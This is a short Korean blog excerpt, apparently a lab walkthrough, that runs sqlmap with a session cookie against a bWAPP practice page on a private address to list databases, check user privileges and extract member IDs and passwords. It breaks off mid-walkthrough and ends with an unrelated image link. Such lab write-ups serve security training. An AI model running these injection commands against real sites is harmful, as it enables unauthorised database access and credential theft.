sqli_1.php 데이터베이스의 회원의 번호, 아이디, 패스워드 획득 sqlmap을 이용한 데이터 정보를 획득하는 과정이다. burpsuite을 통한 쿠키값을 읽어와야 한다. #sqlmap -u "http://192.168.56.102/bWAPP/sqli_1.php?
title=" --cookie="PHPSESSID=ecc56ecf32d6a2eb05e06077adaaadbc; security_level=0" -dbs --current-user, --is-dba, --privilege 옵션을 조합하여 권한을 획득한다. #sqlmap -u "http://192.168.56.102/bWAPP/sqli_1.php?
title=" --cookie="PHPSESSID=ecc56ecf32d6a2eb05e06077adaaadbc; security_level=0" --current-user --is-dba --privilege 다음과 같이 root@localhost의 권한을 가지고 있는 것을 확인할 ...
#
sqlmap
#
공격시나리오
![[Network] - Ping of Death(죽음의 핑)](https://mblogthumb-phinf.pstatic.net/MjAyMDA4MTJfMjIg/MDAxNTk3MjA3MzA3MzQ2.lwfp_XtD7DVo-uZMoJVi2eGOJJ0kNgXHlvzN8RWqnPcg.6T06PHMdjrrFhOjOIXQrZ6h17qXsiyU7H78qXPJmbHYg.PNG.ster098/image.png?type=w2)